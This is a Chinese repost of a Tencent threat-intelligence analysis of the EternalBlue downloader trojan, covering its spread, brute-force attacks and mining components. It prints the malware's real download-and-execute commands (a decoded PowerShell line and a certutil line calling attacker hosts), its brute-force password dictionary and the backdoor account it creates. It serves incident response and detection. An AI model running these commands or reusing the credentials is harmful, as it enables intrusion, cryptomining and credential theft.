[转帖]K8H3D 病毒 腾讯御剑的解析
https://weibo.com/ttarticle/p/show?id=2309404344350225132710
永恒之蓝下载器木马又双叒叕升级了新的攻击方式
背景
腾讯安全御见威胁情报中心于2019年2月25日发现曾利用驱动人生公司升级渠道发起供应链攻击的永恒之蓝下载器木马再次更新。此次更新仍然在攻击模块,在此前新增MS SQL爆破攻击的基础上,更新爆破密码字典,然后将使用mimiktaz搜集登录密码并添加到字典,并利用该字典进行SMB爆破攻击、MS SQL爆破攻击。同添加了永恒之蓝漏洞攻击后木马启动代码、攻击进程执行状态检查代码,并尝试对木马文件添加签名认证。
这个“永恒之蓝”木马下载器黑产团伙自供应链攻击得手之后,一直很活跃,期间不断更新调整木马攻击方式,蠕虫式传播的特点不断增强。
以下是该团伙主要活动情况的时间线:
2018年12月14日
利用“驱动人生”系列软件升级通道下发,利用“永恒之蓝”漏洞攻击传播。
2018年12月19日
下发之后的木马新增PowerShell后门安装。
2019年1月09日
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。
2019年1月24日
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装PowerShell后门。
2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装PowerShell计划任务和hta计划任务。
2019年2月10日
将攻击模块打包方式改为Pyinstaller.
2019年2月20日
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。
2019年2月23日
攻击方法再次更新,新增MS SQL爆破攻击。
2019年2月25日
在2月23日基础上继续更新,更新MS SQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。
一、样本信息
Md5:0a4dcd170708f785f314c16797baaddb
文件路径:C:\Windows\Temp\svchost.exe
计划任务:DnsScan
文件数字签名:“Shenzhen Smartspace Software technology Co.,Limited”
二、样本分析
主程序代码长度对比:2月23日更新后为1886行,2月25日更新后为1909行。
(新增代码1)爆破时使用密码字典新增密码:
'4yqbm4,m`~!@~#$%^&*(),.;'
'A123456'
使用mimiktaz搜集登录密码并添加到该密码字典中
利用该密码字典进行SMB爆破攻击
利用该密码字典进行MsSQL爆破攻击,攻击成功后添加账户:k8h3d,修改MsSQL超级管理员密码为: “ksa8hd4,m@~#$%^&*()”,并将通过MS SQL程序及1433端口进入计算机的防火墙规则设置为允许通过
MsSQL爆破成功后安装Bluetooths计划任务执行powershelll后门:
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="(解密字符:powershell -ep bypass –e IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN))
同时通过Certutil命令下载母体木马植入:
certutil -urlcache -split -f hxxp://dl.haqo.net/dll.exe?fr=MS SQL c:\\setupinstalled.exe&&c:\\setupinstalled.exe
(新增代码2)在永恒之蓝漏洞攻击之成功并且植入木马后,添加通过服务方式启动植入木马installed.exe的代码
(新增代码3)添加并执行函数eb(),检查攻击模块执行状态
安全建议
1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3.使用杀毒软件拦截可能的病毒攻击;
4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Md5
0a4dcd170708f785f314c16797baaddb
弱密码字典
123456,
password,
qwerty,
12345678,
123456789,
123,
1234,
123123,
12345,
12345678,
123123123,
1234567890,
88888888,
111111111,
000000,
111111,
112233,
123321,
654321,
666666,
888888,
a123456,
123456a,
5201314,
1qaz2wsx,
1q2w3e4r,
qwe123,
123qwe,
a123456789,
123456789a,
baseball,
dragon,
football,
iloveyou,
password,
sunshine,
princess,
welcome,
abc123,
monkey,
!@#$%^&*,
charlie,
aa123456,
Aa123456,
admin,
homelesspa,
password1,
1q2w3e4r5t,
qwertyuiop,
1qaz2wsx,
sa,
sasa,
sa123,
sql2005,
1,
admin@123,
sa2008,
1111,
passw0rd,
abc,
abc123,
abcdefg,
sapassword,
Aa12345678,
ABCabc123,
sqlpassword,
1qaz2wsx,
1qaz!QAZ,
sql2008,
ksa8hd4,m@~#$%^&*(),
4yqbm4,m`~!@~#$%^&*(),.; ,
4yqbm4,m`~!@~#$%^&*(),.;,
A123456
[转帖]K8H3D 病毒 腾讯御剑的解析的更多相关文章
- 『安全工具』目录扫描 DirBuster AND 御剑
要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...
- python写个御剑
前言: 今天师傅叫我,写个python版的御剑.然后我之前也写过 不过不怎么样,这次有新想法. 思路: 御剑:读取御剑配置文件里的所有路径,加上用户要扫描的url.进行批量检测,如果状态码为200并且 ...
- 网站后台扫描工具dirbuster、御剑的用法
dirbuster DirBuster是Owasp(Open Web Application Security Project )开发的一款专门用于探测网站目录和文件(包括隐藏文件)的工具.由于使用J ...
- 多年珍藏的55w御剑字典
御剑珍藏55w目录字典,很给力,放在以前直接数据库都能给跑出来. 用法:直接把放入配置文件的目录 链接:https://pan.baidu.com/s/1MGxdd9hH006Y7AO7CpkO8g ...
- 流媒体开发之-腾讯体育NBA视频点播解析
在前面解析赛事和排名,在这里解析点播视频,选取的是腾讯体育链接里面的点播. 首先还是先封装一个保存点播视频的相关信息的类 package com.jwzhangjie.model; import ja ...
- go更新腾讯云DNSPod的解析记录
纯粹练手用的,大家轻喷 获取SecretId,SecretKey 打开腾讯云,登录之后打开https://console.cloud.tencent.com/cam/capi,然后新建密钥记录生成的S ...
- [转帖]认识固态:SSD硬盘内外结构解析
认识固态:SSD硬盘内外结构解析 来自: 中关村在线 收藏 分享 邀请 固态硬盘(Solid State Drive),简称固态盘(SSD),是用固态电子存储芯片阵列而制成的硬盘,由控制单元和存储单元 ...
- [转帖]双剑合璧:CPU+GPU异构计算完全解析
引用自:http://tech.sina.com.cn/mobile/n/2011-06-20/18371792199.shtml 这篇文章写的深入浅出,把异构计算的思想和行业趋势描述的非常清楚,难得 ...
- [转帖]御界预警:3700余台SQL服务器被入侵挖矿 或导致严重信息泄露事件
御界预警:3700余台SQL服务器被入侵挖矿 或导致严重信息泄露事件 https://zhuanlan.kanxue.com/article-8292.htm sqlserver的弱密码破解和提权攻击 ...
随机推荐
- 【BZOJ2117】 [2010国家集训队]Crash的旅游计划
[BZOJ2117] [2010国家集训队]Crash的旅游计划 Description 眼看着假期就要到了,Crash由于长期切题而感到无聊了,因此他决定利用这个假期和好友陶陶一起出去旅游. Cra ...
- UVA1609-Foul Play(构造+递归)
Problem UVA1609-Foul Play Accept: 101 Submit: 514Time Limit: 3000 mSec Problem Description Input Fo ...
- Oracle的条件in中包含NULL时的处理
我们在写SQL时经常会用到in条件,如果in包含的值都是非NULL值,那么没有特殊的,但是如果in中的值包含null值(比如in后面跟一个子查询,子查询返回的结果有NULL值),Oracle又会怎么处 ...
- 在JS中调用CS里的方法(PageMethods)
在JS中调用CS里的方法(PageMethods) 2014年04月28日 11:18:18 被动 阅读数:2998 最近一直在看别人写好的一个项目的源代码,感觉好多东西都是之前没有接触过的.今天 ...
- JavaScript的基本包装类型说明
一.基本包装类型: 为了便于操作基本类型值,ECMAScript 还提供了3个特殊的引用类型:Boolean.Number和String.这些基本包装类型,具有与各自基本类型相应的特殊行为. 实际上我 ...
- 用C# 模拟实现unity里的协程
注:需要了解C#的迭代器,不然很难理解. 之前面试有被问到unity协程的原理,以及撇开unity用纯C#去实现协程的方法.后来了解一下,确实可以的.趁这会有空,稍微总结一下. 还是结合代码说事吧: ...
- 传统前端工程使用 Vue 等框架重构的思路
这段时间遇到类似的问题,第一反应便是使用 cli 搭建项目,但是细想一下立马否决了,原因如下: 工程量太大,猴年马月能重构完,此期间原项目还是没有任何变动(如果没人跟你一起同步修改之前老项目的话 无法 ...
- C++常用代码优化策略
C++代码常用的优化策略 1.不存在指向空值的引用,意味着引用比指针的效率更高,因为在使用引用之前不需要测试它的合法性:指针可以被重新赋值以指向另一个不同的对象,但是引用总是指向它初始化时指定的对象. ...
- JS 深拷贝和浅拷贝概念,以及实现深拷贝的三种方式
一.理解堆栈,基本数据类型与引用数据类型 1.堆栈 栈(stack):系统自动分配的内存空间,内存会由系统自动释放,用来存放函数的参数值,局部变量的值等,特点是先进后出. 堆(heap):系统动态分配 ...
- (Beta)Let's-版本测试报告
测试中发现的Bug Version 2.0 Bug List 在无活动的活动列表下拉加载会崩溃 不能更改个人头像 用户和活动不显示头像 百度地图无法打开 在某些机型上软件装不上 图片加载有时不加载,有 ...